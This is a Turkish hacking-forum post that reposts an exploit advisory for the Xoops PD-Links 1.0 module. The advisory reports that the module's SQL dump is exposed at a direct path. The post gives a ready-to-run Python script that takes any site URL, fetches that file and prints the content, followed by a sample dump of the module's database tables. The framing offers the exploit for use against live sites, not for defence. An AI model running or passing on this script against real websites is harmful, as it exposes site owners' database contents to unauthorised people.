İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Xoops 1.0.2 PD-Links Modules 1.0 Krobi Database Disclosure

03-03-2019 18:28
#1
Ludas - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Ludas.py
Yaş:
19
Mesajlar:
216
Teşekkür (Etti):
27
Teşekkür (Aldı):
39
Konular:
28
Ticaret:
(0) %
################################################## ##################

# Exploit Title : Xoops 1.0.2 PD-Links Modules 1.0 Krobi Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 03/03/2019
# Vendor Homepage : xoops.org ~ power-dreams.com
# Software Download Link : xoops.org/modules/repository/visit.php?cid=40&lid=1491
# Software Information Link : xoops.org/modules/repository/singlefile.php?cid=40&lid=1491
# Software Version : 1.0
Compatible with Xoops 1.0.2 and 2.4.x
# Software Technical System Requirements :
Price: Free | Platform: 2.4.x | License: Sun Solaris Source Code
(Foundation Release) License (v. 1.1) | Limitations: None
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about => phpMyAdmin SQL dump Web Vulnerability
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/


################################################## ##################


# Description about Software :
***************************
This Module is based on the WF-Downloads 2.05a Module. It is called PD-Links Modules.

This new features make it easier for you to administrate the module.


################################################## ##################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of

MySQL over the World Wide Web. It can be used to dump a database or a collection of

databases for backup or transfer to another SQL server (not necessarily a MySQL server).

The dump typically contains SQL statements to create the table, populate it, or both.

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and

should not be found on a production system.


################################################## ##################

Direct Access =>
***************
VULNERABLESITE/sql/PDlinks.sql

# Database Disclosure Information Exposure Exploit :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/sql/PDlinks.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit


################################################## ##################

# Example Information about SQL Dump File =>
******************************************

# phpMyAdmin SQL Dump
# version 2.5.5-pl1
# http://www.phpmyadmin.net
#
# Host: localhost
# Generation Time: Jul 25, 2004 at 11:45 PM
# Server version: 3.23.56
# PHP Version: 4.3.4
#
# Database : `205test`

#

# --------------------------------------------------------


#
# Table structure for table `PDlinks_broken`
#

CREATE TABLE PDlinks_broken (
reportid int(5) NOT NULL auto_increment,
lid int(11) NOT NULL default '0',
sender int(11) NOT NULL default '0',
ip varchar(20) NOT NULL default '',
date varchar(11) NOT NULL default '0',
confirmed enum('0','1') NOT NULL default '0',
acknowledged enum('0','1') NOT NULL default '0',
PRIMARY KEY (reportid),
KEY lid (lid),
KEY sender (sender),
KEY ip (ip)
) ENGINE=MyISAM;


#
# Dumping data for table `PDlinks_broken`
#


# --------------------------------------------------------

#
# Table structure for table `PDlinks_cat`
#

CREATE TABLE PDlinks_cat (
cid int(5) unsigned NOT NULL auto_increment,
pid int(5) unsigned NOT NULL default '0',
title varchar(50) NOT NULL default '',
imgurl varchar(150) NOT NULL default '',
description varchar(255) NOT NULL default '',
total int(11) NOT NULL default '0',
spotlighttop int(11) NOT NULL default '0',
spotlighthis int(11) NOT NULL default '0',
nohtml int(1) NOT NULL default '0',
nosmiley int(1) NOT NULL default '0',
noxcodes int(1) NOT NULL default '0',
noimages int(1) NOT NULL default '0',
nobreak int(1) NOT NULL default '1',
weight int(11) NOT NULL default '0',
PRIMARY KEY (cid),
KEY pid (pid)
) ENGINE=MyISAM;


#
# Dumping data for table `PDlinks_cat`
#

# --------------------------------------------------------

#
# Table structure for table `PDlinks_links`
#

CREATE TABLE PDlinks_links (
lid int(11) unsigned NOT NULL auto_increment,
cid int(5) unsigned NOT NULL default '0',
title varchar(100) NOT NULL default '',
url varchar(255) NOT NULL default '',
screenshot varchar(255) NOT NULL default '',
submitter int(11) NOT NULL default '0',
publisher varchar(255) NOT NULL default '',
status tinyint(2) NOT NULL default '0',
date int(10) NOT NULL default '0',
hits int(11) unsigned NOT NULL default '0',
rating double(6,4) NOT NULL default '0.0000',
votes int(11) unsigned NOT NULL default '0',
comments int(11) unsigned NOT NULL default '0',
forumid int(11) NOT NULL default '0',
published int(11) NOT NULL default '1089662528',
expired int(10) NOT NULL default '0',
updated int(11) NOT NULL default '0',
offline tinyint(1) NOT NULL default '0',
description text NOT NULL,
ipaddress varchar(120) NOT NULL default '0',
notifypub int(1) NOT NULL default '0',
PRIMARY KEY (lid),
KEY cid (cid),
KEY status (status),
KEY title (title(40))
) ENGINE=MyISAM;


#
# Dumping data for table `PDlinks_links`
#

# --------------------------------------------------------


#
# Table structure for table `PDlinks_indexpage`
#

CREATE TABLE PDlinks_indexpage (
indeximage varchar(255) NOT NULL default 'blank.png',
indexheading varchar(255) NOT NULL default 'PD-Links',
indexheader text NOT NULL,
indexfooter text NOT NULL,
nohtml tinyint(8) NOT NULL default '1',
nosmiley tinyint(8) NOT NULL default '1',
noxcodes tinyint(8) NOT NULL default '1',
noimages tinyint(8) NOT NULL default '1',
nobreak tinyint(4) NOT NULL default '0',
indexheaderalign varchar(25) NOT NULL default 'left',
indexfooteralign varchar(25) NOT NULL default 'center',
FULLTEXT KEY indexheading (indexheading),
FULLTEXT KEY indexheader (indexheader),
FULLTEXT KEY indexfooter (indexfooter)
) ENGINE=MyISAM;


#
# Dumping data for table `PDlinks_indexpage`
#

INSERT INTO PDlinks_indexpage VALUES ('logo-en.gif', 'PD-Links', '<div><b>Welcome to the PD Links Section.</b></div>', 'PD-Links', 0, 0, 0, 0, 1, 'left', 'Center');


# --------------------------------------------------------


#
# Table structure for table `PDlinks_mod`
#

CREATE TABLE PDlinks_mod (
requestid int(11) NOT NULL auto_increment,
lid int(11) unsigned NOT NULL default '0',
cid int(5) unsigned NOT NULL default '0',
title varchar(255) NOT NULL default '',
url varchar(255) NOT NULL default '',
screenshot varchar(255) NOT NULL default '',
submitter int(11) NOT NULL default '0',
publisher text NOT NULL,
status tinyint(2) NOT NULL default '0',
date int(10) NOT NULL default '0',
hits int(11) unsigned NOT NULL default '0',
rating double(6,4) NOT NULL default '0.0000',
votes int(11) unsigned NOT NULL default '0',
comments int(11) unsigned NOT NULL default '0',
forumid int(11) NOT NULL default '0',
published int(10) NOT NULL default '0',
expired int(10) NOT NULL default '0',
updated int(11) NOT NULL default '0',
offline tinyint(1) NOT NULL default '0',
description text NOT NULL,
modifysubmitter int(11) NOT NULL default '0',
requestdate int(11) NOT NULL default '0',
PRIMARY KEY (requestid)
) ENGINE=MyISAM;

#
# Dumping data for table `PDlinks_mod`
#

# --------------------------------------------------------


#
# Table structure for table `PDlinks_votedata`
#

CREATE TABLE PDlinks_votedata (
ratingid int(11) unsigned NOT NULL auto_increment,
lid int(11) unsigned NOT NULL default '0',
ratinguser int(11) NOT NULL default '0',
rating tinyint(3) unsigned NOT NULL default '0',
ratinghostname varchar(60) NOT NULL default '',
ratingtimestamp int(10) NOT NULL default '0',
PRIMARY KEY (ratingid),
KEY ratinguser (ratinguser),
KEY ratinghostname (ratinghostname),
KEY lid (lid)
) ENGINE=MyISAM;

#
# Dumping data for table `PDlinks_votedata`
#


Exploit : https://cxsecurity.com/issue/WLB-2019030010
Kullanıcı İmzası

|~ Yalnızlık olsun istediğin, uzaya mahkum ederim. ~|

Telegram ⋟ @Ludas_THT

|~ Vaktimiz doldu, artık gözlerin kapalı. ~|


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı